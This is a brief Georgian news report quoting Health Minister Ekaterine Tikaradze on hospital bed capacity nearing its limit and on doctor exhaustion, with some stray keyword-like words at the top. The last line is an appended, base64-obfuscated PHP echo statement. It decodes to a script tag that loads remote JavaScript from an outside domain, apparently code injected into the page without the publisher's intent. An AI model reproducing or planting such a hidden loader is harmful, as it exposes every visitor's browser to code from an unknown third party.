celsiusi
ავერსი საქკაბელი
საქართველოს ჯანდაცვის მინისტრის ეკატერინე ტიკარაძის განცხადებით, ჯანდაცვის სექტორი საწოლფონდთან მიმართებით უკვე გარკვეულ ზღვარზეა, ყოველდღიურად მიმდინარეობს მუშაობა, თუმცა რესურსი სულ უფრო და უფრო ნაკლებია.
 
მისივე თქმით, ასევე გასათვალისწინებელია ექიმების გადაღლილობა, რომლებიც უკვე წელიწადნახევარზე მეტია, საგანგებო რეჟიმში მუშაობენ. 
 
„ჯანდაცვის სექტორში რეალურად საწოლფონდთან მიმართებაში ვართ უკვე გარკვეულ ზღვარზე. რა თქმა უნდა, მიმდინარეობს მუშაობა ყოველდღიურად თუმცა, რესურსი სულ უფრო და უფრო ნაკლებია. ასევე გასათვალისწინებელია ექიმების გადაღლილობა, რომლებიც უკვე წელიწადნახევარზე მეტია, ამ რეჟიმში მუშაობენ. ძალიან დიდი იმედი მაქვს, ჩვენი საზოგადოების გონიერების, რომ ისინი დაუდგებიან გვერდში როგორც ჯანდაცვის სამინისტროს, ასევე თითოეულ ექიმს და შესაბამისად, თავს შეიკავებენ იმ ღონისძიებებისგან, რომლებიც მთავარი ბუსტერები არიან“, – განაცხადა ტიკარაძემ.
 
 
1205
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");